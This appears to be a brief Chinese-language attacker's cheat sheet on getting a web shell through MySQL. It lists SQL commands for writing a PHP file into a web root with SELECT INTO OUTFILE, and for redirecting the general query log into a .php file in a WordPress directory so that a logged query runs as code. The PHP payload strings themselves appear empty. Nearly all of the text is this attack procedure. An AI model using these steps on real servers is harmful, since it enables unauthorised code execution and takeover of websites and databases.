mysql getshell

mysql getshell:

1、利用select '代码' into outfile '绝对路径'

select '' INTO OUTFILE 'C:/phpstudy/PHPTutorial/WWW/shell.php'

2、利用general_log:

general_log是mysql日志文件，可以记录mysql的所有操作。

相关操作：

show variables like 'general_log'; -- 查看日志是否开启

set global general_log=on; -- 开启日志功能

show variables like 'general_log_file'; -- 看看日志文件保存位置

set global general_log_file='tmp/general.lg'; -- 设置日志文件保存位置

show variables like 'log_output'; -- 看看日志输出类型 table或file

set global log_output='table'; -- 设置输出类型为 table

set global log_output='file'; -- 设置输出类型为file

写入shell：

set  global general_log=on;//开启日志记录

SET global general_log_file='C:/phpstudy_pro/WWW/wordpress/test.php';//将日志产生的默认路径改成php文件。

SELECT ''; //日志中插入代码，之后访问上面的test.php即可getshell